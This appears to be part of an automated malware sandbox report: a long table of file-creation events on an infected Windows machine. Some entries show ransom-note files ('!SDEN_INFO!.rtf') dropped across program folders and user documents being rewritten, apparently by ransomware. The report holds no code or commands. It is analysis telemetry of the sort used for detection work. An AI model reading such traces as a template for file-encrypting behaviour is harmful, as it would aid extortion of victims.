| Create | C:\Logs\Microsoft-Windows-Winlogon%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\flavormap.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-International%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\YP-X.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\K1x_a5kN_6Xhy9ntGym\PWEP9ZZOb dHlAYjsy\p2O0.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\netfx_Core_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\javacpl.cpl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-LiveId%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Known Folders API Service.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-SMBServer%4Audit.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaTypewriterRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-TWinUI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\java-rmi.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\orbd.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-SettingSync%4Debug.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\unpack200.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\klist.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\irP-_lJVXPj FWZ6iyYJ\Z_PSSxHcDpT\tmPhlv28.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\ZOJs8SfeUiV.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\javafx.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\Windows6.0-KB956250-v6001-x86.msu | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\java.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\bad_6088DED4F047F45E.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-SMBServer%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\61.0.3163.79\Installer\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\PYCC.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\management\jmxremote.access | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\resources.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-SMBServer%4Security.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_ko.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\GRAY.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\ktab.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_it.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-UserPnp%4DeviceInstall.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash_11-lic.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\tnameserv.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\nashorn.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-AppLocker%4EXE and DLL.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\LINEAR_RGB.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Security.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunjce_provider.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_ja.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash_11@2x-lic.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\4nSkn.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\K1x_a5kN_6Xhy9ntGym\PWEP9ZZOb dHlAYjsy\h5VAwW1b0gH3jYX9oE4.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\netfx_Core.mzz | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunec.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightDemiItalic.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\management\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\javacpl.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\javaw.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\sound.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\policytool.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_LinkDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightItalic.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jfxswt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\net.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\pack200.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\accessibility.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_CopyDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\java.security | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\THIRDPARTYLICENSEREADME-JAVAFX.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jfr\profile.jfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\content-types.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\COPYRIGHT | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\management-agent.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_sv.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_CopyNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\sRGB.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-PnP%4Configuration.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\hR6CmyF41D7GurnQ7sOc.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\GlzMlE4S.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\iSUyvv2-pWLpyw9zJXDb.odt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\cldrdata.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_pt_BR.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\cacerts | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jfr.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\features\clicktoplay-rollout@mozilla.org.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\access-bridge-64.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jfr\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\crashreporter.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\ClientX64\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\qR4asBdhoH30jOJbDKW.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\dictionaries\en-US.aff | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\omni.ja | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-NCSI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\README.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunmscapi.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\maintenanceservice.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaSansDemiBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\meta-index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\freebl3.chk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\update-settings.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_LinkNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\java.policy | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\removed-files | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
